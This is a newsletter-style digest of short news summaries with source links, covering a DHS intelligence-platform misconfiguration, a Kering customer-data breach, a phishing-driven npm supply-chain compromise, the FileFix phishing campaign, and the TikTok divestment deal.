DHS Misconfiguration Exposes Surveillance Data to Thousands of Unauthorized Users

From March to May 2023, a coding error on the Department of Homeland Security’s HSIN-Intel platform—a system designed for sharing sensitive but unclassified intelligence among DHS, FBI, NCTC, fusion centers, and local law enforcement—accidentally granted “everyone” access permissions. The misconfiguration exposed 439 intelligence “products” to 1,525 unauthorized views, including 518 private-sector users and 46 foreign nationals. Materials included domestic protest surveillance (e.g., Stop Cop City), foreign-state cyber operations, and tips or leads. Nearly 40% of accessed data concerned cybersecurity.

Although DHS’s Office of Privacy initially assessed the breach as low-impact, the memo’s anonymous author disagreed, citing exposure of Americans’ personally identifiable information and recommending I&A staff retraining. Spencer Reynolds of the Brennan Center obtained the memo via FOIA, while EPIC’s Jeramie Scott flagged reduced oversight, pointing to the effective dismantling of DHS’s Office for Civil Rights and Civil Liberties. DHS claimed no serious harm; ODNI declined comment. Pending legislation may restrict DHS surveillance—but exempts HSIN-Intel sharing.

Read: https://www.wired.com/story/a-dhs-data-hub-exposed-sensitive-intel-to-thousands-of-unauthorized-users/

Kering Suffers Data Breach Targeting Luxury Shoppers Amid Surge in High-End Cyberattacks

Shiny Hunters, also known as UNC6040, breached Kering in April, exfiltrating customer names, emails, phone numbers, addresses, and “Total Sales” data from Balenciaga, Gucci, and Alexander McQueen—excluding payment or ID details. Claiming access to 7.4 million unique emails, the attacker shared a sample with the BBC showing clients who spent $30K–$86K, raising risks of secondary scams.

Kering discovered the breach in June, privately notified affected individuals, informed regulators, and declined public disclosure, as GDPR allows if direct contact is made. Shiny Hunters claim they demanded a Bitcoin ransom; Kering denies communication. The attacker reportedly infiltrated via stolen Salesforce credentials, a method seen in concurrent luxury brand breaches (Cartier, Louis Vuitton) and linked to phishing campaigns flagged by Google, which was also compromised. Google had warned of UNC6040’s employee-targeting tactics. The UK’s National Cyber Security Centre recommends password resets, unique credentials, and two-factor authentication. Kering says its IT systems have since been secured.

Read: https://www.bbc.com/news/articles/crl5j8ld615o

Phishing Breach Exposes Fragility of the JavaScript Ecosystem

Aikido Security disclosed the largest npm supply chain breach to date, triggered by a phishing email impersonating npm support. A single maintainer was duped into surrendering two-factor credentials, enabling attackers to publish malicious versions of 18 high-traffic packages—chalk, debug, and duckdb among them—altering index.js files to surveil fetch, XMLHttpRequest, and window.ethereum for crypto hijacking. Though detected within minutes, millions downloaded compromised versions. The payload earned the attackers a trivial haul—5 cents of ETH and $20 in memecoin—but triggered global remediation: audits, compliance costs, and security sweeps.

The incident highlights how attackers, including APTs like Lazarus, increasingly exploit single points of failure in open-source ecosystems for mass reach. Registries like PyPI, RubyGems, and Maven Central share these vulnerabilities. Suggested reforms include phishing-resistant hardware keys, anomaly detection, SBOM adoption, and urgent responses to malicious packages akin to zero-days. The breach was contained quickly; the structural risk remains.

Read: https://cyberscoop.com/npm-supply-chain-compromise-brian-fox-sonatype-op-ed/

FileFix Exploit Spreads Globally Through AI Images and Facebook Phishing

In under three months, mr. d0x’s FileFix—an evolution of 2022’s ClickFix—has gone from proof-of-concept to centerpiece of a sophisticated phishing campaign observed by Acronis researchers. Unlike ClickFix’s use of the Run dialog, FileFix leverages Windows Explorer’s address bar, tricking users into pasting clipboard-injected PowerShell under the guise of uploading a file—usually to “appeal” a fake Facebook account suspension. The attack, localized in 16+ languages, spans the U.S., China, Germany, Peru, and beyond, and employs AI-generated JPGs that conceal a second payload via steganography. That payload downloads StealC, a commercial infostealer targeting browsers, crypto wallets, cloud apps, VPNs, and messaging platforms.

Victims encounter looping error messages, unaware their credentials are siphoned. The campaign’s novelty, speed (just “a couple of button presses”), and use of unexplored UX terrain—not covered in standard phishing awareness—give it legs. Acronis’s Eliad Kimhy notes FileFix sidesteps enterprise restrictions on the Run dialog, making high-value targets newly reachable.

Read: https://www.darkreading.com/cyberattacks-data-breaches/innovative-filefix-attack-potent

Trump Delays TikTok Ban as US Consortium Eyes Control Without Algorithm

TikTok will not be banned Wednesday, thanks to President Trump extending ByteDance’s divestment deadline to December 16. A deal—still in flux—would shift 80% ownership to a U.S. investor consortium including Oracle, Silver Lake, and Andreessen Horowitz, joined by existing ByteDance investors KKR, General Atlantic, and Susquehanna International, per WSJ. TikTok’s new board would be American-dominated, with one U.S. government appointee. Trump expects a finalized deal in 30–45 days, per CNBC. However, China keeps the algorithm, licensing it to the U.S. while forcing American engineers to re-create its recommendation system. FT notes content flows between U.S. and global apps would remain, while China enforces export controls. Wang Jingtao of China’s cybersecurity agency vaguely promised ByteDance would “entrust” U.S. user data to U.S. entities. Senator Chuck Grassley and other Republicans threaten intervention if the deal defies the Protecting Americans from Foreign Adversary Controlled Applications Act.

Read: https://arstechnica.com/tech-policy/2025/09/china-keeps-the-algorithm-critics-attack-trumps-tiktok-deal/